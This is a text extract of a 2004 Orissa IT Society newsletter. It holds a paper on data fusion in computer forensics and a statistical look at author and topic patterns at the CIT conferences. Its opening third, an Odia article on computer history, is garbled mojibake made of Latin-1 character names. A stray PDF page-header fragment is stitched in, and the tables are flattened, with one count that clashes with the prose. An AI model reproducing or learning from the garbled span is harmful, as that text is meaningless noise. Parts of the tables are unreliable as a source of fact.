AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 21: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

17

One of the keys to solve this problem is Dataand Information Fusion The techniques of DataFusion are designed to provide information ofa higher quality than could be obtained by usinga set of sensors independently The no of factorsthat allow the integration of data to be beneficialare

1 Redundancy2 Complementarities3 Timeliness4 Cost of the information

So the Law-Enforcement Agencies has aclear role to protect the informationinfrastructure which is critical to nationalsecurity and protect the public from criminal ormalicious activity occurring through theseelectronic mediums By explaining the nature ofthe vulnerabilities faced by the organizationstoday and discussing the problems this paperoffers an introduction to some of the technicalissues surrounding this new and specializedfield of Data Fusion and its application inComputer Forensics to identify and describesources of evidence to help the Law Enforcementand Forensic Investigating Agencies

2 ELEMENTS AND OBJECTIVES OFCOMPUTER FORENSICS

Computer forensics is the study ofcomputers and networks as they relate to legalprocesses The objective of Computer Forensicsis to learn about computer systems and networksand the information they contain and to do itin such a way that the knowledge can be usedin legal proceedings It is defined as anapplication of computer investigations andanalysis techniques in the interests ofdetermining Potential Legal Digital Evidence

Computer specialists can draw on an arrayof methods for discovering deleted

encrypted or damaged file information(Robbins 1997)

There are four steps in ComputerForensics [3]

1 Identify the evidence2 Preserve the evidence3 Analyze the evidence4 Present the evidence

Objective

1 Recovery Evidence preservation Damage control System restoration

2 Causation (Problem source)3 Proof Evidence Analysis Prove it to prevent future incidents

The tools and processes used in thecollection preservation and analysis ofComputer Forensics evidences are different foreach situation and computer system or network

3 DATA FUSION

Data Fusion is the process of combininginformation from a variety of sensors to producea unified result It can also be defined as a processof combining complementary information frommultiple sensor data to generate a single datathat contains a more accurate description of thescene than any of the individual source dataThe purpose is to merge the data coming fromdifferent information sources and the motivationis to provide information about a scene notobtainable from a single source or to reduce theuncertainty associated with data coming fromsingle source The fusion process ideallygenerates a single composite data that representsall the useful information from a set of data of

OITS-2004

18

different sensors thus removing the problemsinherent in frame-by-frame evaluation andimproves the data interpretation and recognitionby taking advantage of the complementarycharacteristics of different sensors

31 Advantages of Data fusionThe advantages gained through the

synergistic use of multisensory information canbe decomposed into a combination of fourfundamental aspects the redundancycomplementarily timeliness and cost of theinformation which can then be defined as thedegree to which each of these four aspects ispresent in the information provided by thesensors It also provides the following potentials

1Information from multiple viewpoints2 Extended coverage3 Improved accuracy4 Robust and fault-tolerant operation

32 Application and Potential opportunities ofData Fusion in Computer Forensics

Application of Data Fusion in variousfields

Data-fusion technology has been appliedmost prominently to military applications suchas battlefield surveillance and tactical situationassessment Data fusion has also emerged incommercial applications such as roboticsmanufacturing medical diagnosis and remotesensing [11 13 14] In a typical militarycommand and control (C2) system data fusionsensors are used to observe electromagneticradiation acoustic and thermal energy nuclearparticles infrared radiation noise and othersignals [12] In cyberspace security systems thesensors are different because the environmentaldimension is different Instead of a missilelaunch and supersonic transport through theatmosphere cyberspace sensors observeinformation flowing in networks However justas C2 commanders are interested in the originvelocity threat and targets of a warhead thesecurity personnels are interested in the identityrate of attacks threats and targets of maliciousintruders and criminals

Sensor 1

Sensor n

Data

Acquisition

Data

Fusion

Feature Extraction and Interpretation

Identify required

data

PROCESS OF DATA FUSION

The fusion process opens a way to reacha better analysis and understanding of the datafrom the viewpoint of accuracy andor reliabilityby providing enhanced information frommultiple sources [1 7 16] When the sensorsprovide information about the same aspect of aspecific entity the redundancy can be used toincrease accuracy and reliability The inherentparallel nature of using the multiple sensorsmeans that these systems usually operate fasterthan a single sensor could One way of accessingthe performance of such type of fusion systemis to measure the enhancement or thedegradation in the information provided by thesystem

Data + Algorithms + Knowledge = Data Fusion

Fusion Techniques

There are various types of fusion techniques

1 Low level fusion2 Medium level fusion3 High level fusion

OITS-2004

19

In CFThe major goal of Computer Forensics is to

develop and apply the scientific methods infinding the solutions driven by practitionerrequirements and addressing the needsconsidering the current paradigms Profilingidentifying tracing and apprehending cybersuspects are the important issues of researchtoday The ultimate goal is to obtain sufficientevidence in order to trace the crime back to thecriminal Within a computer system theanonymity afforded the criminal encouragesdestructive behavior while making it extremelydifficult for Law Enforcers to prove the identityof the criminal Therefore the ability to obtainthe fingerprint of the users is imperative toacquire some hold on identifying the perpetrator

The studies of available Log files alwaysstand as fundamental in evidence collection Butat a higher level it is necessary to possess a morein depth ability to narrow the field or evenestablish a list of possible suspects So the needof the hour is to develop a concept frameworkto assist Law Enforcement and ForensicInvestigating Agencies to gather the digitalevidences against electronic crimes bydeveloping methodology tools technology andprinciples for analysis and examination leadingto PLDE for expert testimony in the Court of Law

Multisensor Data Fusion provides animportant functional framework for buildingAdvanced Security Management systems andcyberspace security awareness A significantchallenge remains for security systems designersto combine the data and information fromnumerous heterogeneous distributed systemsinto a coherent process that can be used toevaluate the security of the cyberspace

Multisensor data-fusion technology is animportant avenue on the road toward the

development of highly reliable security-decisionsystems that identify track and assesscyberspace situations with multiple complexthreats The output of Fusion-based securitysystems will be the estimates of the identity(location) of a threat source the maliciousactivity taxonomy of the threats the attack ratesand an assessment of the potential severity ofthe projected target(s) This information can beused for gathering the Legal Digital Evidence toprovide timely Justice and punish the criminalby efficiently and timely analyzing the cases4 CONCLUSION

There exist significant opportunities andnumerous technical challenges for thecommercial application of Data Fusion theoryinto the art and science of cyberspace securitysystems The data fusion process is in the veryearly stages of technical development Howeveras networks continue to grow and the expandingrealms of cyberspace evolve there will be anurgent need to drive various securitymanagement systems towards next-generationcapabilities Determining the origin of highlysophisticated damage in cyberspace willcontinue to grow in complexity as attackersbecome more cyberspace astute So the futureSecurity systems tracking coordinatedmultifaceted cyberspace attacks require clusteranalysis techniques adaptive neural networksand rule-based knowledge systems

Multisensor Data fusion is a multifacetedengineering approach requiring the integrationof numerous diverse disciplines such asstatistics artificial intelligence signalprocessing pattern recognition cognitive theorydetection theory and decision theory Integratedsensor and decision support tools are emergingrequirements for robust and reliable AdvancedSecurity management systems in complexinternetworks

OITS-2004

20

5 REFERENCES

[1] wwwdatafusionorg

[2] Approaches to improve automation forsecurity Cyber Information Assurance ampDecision Support (CIADS) InformationSystems Laboratory Applied ResearchLaboratories the University of Texas atAustin

[3] Handbook of Computer Crime InvestigationForensic Tools amp Technology by EoghanCasey (Editor) Academic Press 2002

[4] Internet Engineering Task Force NetworkWorking Group Guidelines for the SecureOperation of the Internet RFC1281Available on line ftpinfocertorgpubietfssphwg

[5] Policies to Enhance Computer and NetworkForensics Proceedings of the 2001 IEEEWorkshop on Information Assurance andSecurity United States Military AcademyWest Point NY 5-6 June 2001

[6] Hochberg et al NADIR An automated systemfor detecting network intrusion andmisuse Computers amp Security 1993Elsevier Science New York 235248

[7] D L Hall and J Llinas An introduction toMultisensor data fusion In Proceedingsof the IEEE vol 85 ndeg 1 pp 6-23 1997

[8] L A Klein Sensor and data fusion conceptsand applications Tutorial texts vol TT14 SPIE Optical Engineering Press USA131 p 1993

[9] Waltz E Information Warfare Principles andOperations 1998 Artech House BostonMA

[10] Hall D Mathematical Techniques inMultisensor Data Fusion 1992 ArtechHouse Boston MA

[11]L F Pau Sensor data fusion Journal ofIntelligent and Robotics Systems vol 1pp 103-116 1988

[12] DSTO (Defence Science and TechnologyOrganization) Data Fusion SpecialInterest Group Data fusion lexiconDepartment of Defence Australia 7 p21 September 1994

[13] Varshney P Distributed Detection and DataFusion 1995 Springer-Verlag NewYork NY

[14] Wald L A European proposal for terms ofreference in data fusion InternationalArchives of Photogrammetry and RemoteSensing Vol XXXII Part 7

[15]Cyber Forensics by Simson Garfinkel

[16] Waltz E and Llinas J Multisensor DataFusion 1990 Artech House Boston MA

OITS-2004

21

The Conferences on InformationTechnology or CITs as they are more popularlyknown have been organised by the OrissaInformation Technology Society every year since1998 It was the first ever internationalconference on IT to be held in Orissa and becamean instant hit The overwhelming success of thisedition conveyed the message that not only hadCIT arrived but it was here to stay Apart fromtheir successes academically these conferencesalso present some interesting patterns regardingthe multiplicity of the authors their regions aswell as the areas of research1 Multiplicity of authors

The papers presented in these conferenceshave had authors ranging between one andseven However it has been found that papershaving two and three authors have dominatedwhile papers having five or more authors havebeen few and far between (Fig1) The onlyexception came in the first edition when papershaving two authors comprised more than three-fifths of the total number of papers (Fig2) Thedetails of the multiplicity of authors have beenpresented in Table 1 which is drawn

Interesting Patterns in CITsA Misra

Silicon School of Information TechnologySilicon Hills Patia Bhubaneswar-751031

aurabindasiliconacin

2 Regions of participations In this section we will consider the

participating regions in terms of countries aswell as institutes With India being the hostcountry she has the maximum representationunderstandably But if we look at the trends inthe participation of other countries we can alsoobserve certain interesting patterns

Firstly the United States has the highestrepresentation from overseas having at least oneauthor in thirty-five papers over the six editionsIt is followed by Japan (11) and Australia(10) inthat order (Table 2) It may be noted with interestthat there were three papers from Brazil in the1999 edition but those are the only papers fromBrazil till date Besides there are about twelvecountries which have only one occurrence whileUSA and Japan have been represented in everyedition

However one discouraging factor has beenthe sharp decline in overseas participants overthe six editions (Fig 3) While in the first edition5405 of the papers had at least one overseasauthor the figure has been hovering around the25 mark in the last four editions In spite ofthis 2003 has recorded the highest number ofpapers having overseas particpation ietwenty-one

On the contrary papers from Orissa havebeen increasing steadily every year which hasbeen shown in Fig 4

As far as Institutes are concerned then theIITs have been the most prominent with theexceptions of IIT Delhi and IIT Roorkee whichhave respectively six and one one contributions

Number of authors per paperYear 1 2 3 4 5 6 71998 6 21 8 1 1 0 01999 8 12 13 8 1 2 02000 5 15 12 1 0 0 12001 3 20 24 5 1 0 02002 4 16 17 4 0 2 02003 9 34 33 4 3 0 0

Table 1

OITS-2004

22

Multiplicity patterns

Fig 11998

Fig 2

age of papers involving overseas au thors yearwise

Fig 3Year

Year

OITS-2004

23

till date Leading the pack are IIT Kharagpurwith thirty-five papers and IIT Guwahati withtwenty-seven Among the other IITs IIT Kanpurhas seventeen while IIT Bombay and IIT Madrashave nine apiece Among the other InstitutesJadavpur University has contributed seventeenpapers while University of Hyderabad hascontributed ten The list of the leading Institutesin terms of number of papers alongwith ayearwise breakdown is given in Table 3

Another interesting trend that can beobserved here is that while the USA leadsoverseas list none of the Institutes figure in thelist while one Institute from Japan figures in thelist It can be concluded that the papers from the

Country 1998 1999 2000 2001 2002 2003 TotalUSA 6 10 3 8 1 7 35

Netherlands 2 0 1 0 0 0 3Japan 2 3 1 3 1 1 11

Australia 3 0 1 1 2 3 10Kuwait 1 0 0 0 0 0 1China 1 0 0 0 0 1 2

Sweden 1 0 0 0 0 0 1UK 1 0 0 0 2 3 6

Portugal 1 0 0 0 0 0 1Italy 1 2 1 1 1 0 6

Canada 1 1 0 0 1 3 6Taiwan 0 1 0 0 0 0 1Brazil 0 3 0 0 0 0 3

Finland 0 1 0 0 0 0 1Mexico 0 1 0 0 0 0 1

Germany 0 1 1 0 0 0 2Malaysia 0 0 1 0 1 1 3

Macao 0 0 0 1 0 0 1Thailand 0 0 0 1 0 0 1Norway 0 0 0 1 1 0 2

Singapore 0 0 0 0 1 0 1Serbia amp

Montenegro 0 0 0 0 0 1 1Tanzania 0 0 0 0 0 1 1

Table 2USA have been scattered across the countrywhile those from Japan have been concentratedin some particular Institutes3 The Topics

As far the topics are concernedNetworking leads the table with a total ofthirtythree papers Among other topics ofprominence are Soft Computing with thirty-onepapers Web-based computing with eighteenand Parallel amp Distributed Computing withsixteen papers Even though there have beenpapers from almost all areas of ComputerScience none of those areas have featuredconsistently in these conferences

OITS-2004

24

Trends in papers having authors from Orissa

Fig 4

Bibliography1 Mahapatra RN ed CIT 98 Trends in

Information Technology Tata McGraw-HillNew Delhi

2 Mohanty H and Baral C ed CIT 99 Trendsin Information Technology Tata McGraw-Hill New Delhi

3 Ghosh RK and Misra D ed CIT 2000Proceedings of Third InternationaConference on Information Technology TataMcGraw-Hill New Delhi

Institute 1998 1999 2000 2001 2002 2003 TotalIIT Kharagpur India 5 0 3 8 5 15 36IIT Guwahati India 1 7 4 6 5 4 27

Jadavpur University India 5 3 0 5 2 2 17IIT Kanpur India 3 1 1 6 2 4 17

University of HyderabadIndia 0 1 0 5 1 3 10

IIT Bombay India 1 3 2 1 1 1 9IIT MadrasIndia 0 0 1 2 3 3 9Iwate PrefecturalUniversity Japan 2 1 1 2 1 1 8

Table 34 Pujari AK and Mohapatra P ed CIT 2001

Proceedings of Fourt InternationalConference on Information Technology TataMcGraw-Hill New Delhi

5 Iyer S and Naik S ed CIT 2002 Proceedingsof Fifth International Conference onInformation Technology Tata McGraw-HillNew Delhi

6 Chakraborty G and Sarkar S ed CIT 2003Proceedings of Sixth InternationalConference on Information Technology TataMcGraw-Hill New Delhi

Year

OITS-2004

25

Conference is an academic activity thatallows researchers from a particular field topresent their findings and take suggestions andcomments from peers Academicians who arenot even presenting papers also attend theconference in order to keep themselves abreastof developments in the particular field and alsoto network with other attendees for possibleresearch collaboration In academic world thereis always the pressure of publish or perishConferences are an outlet to help academiciansto publish

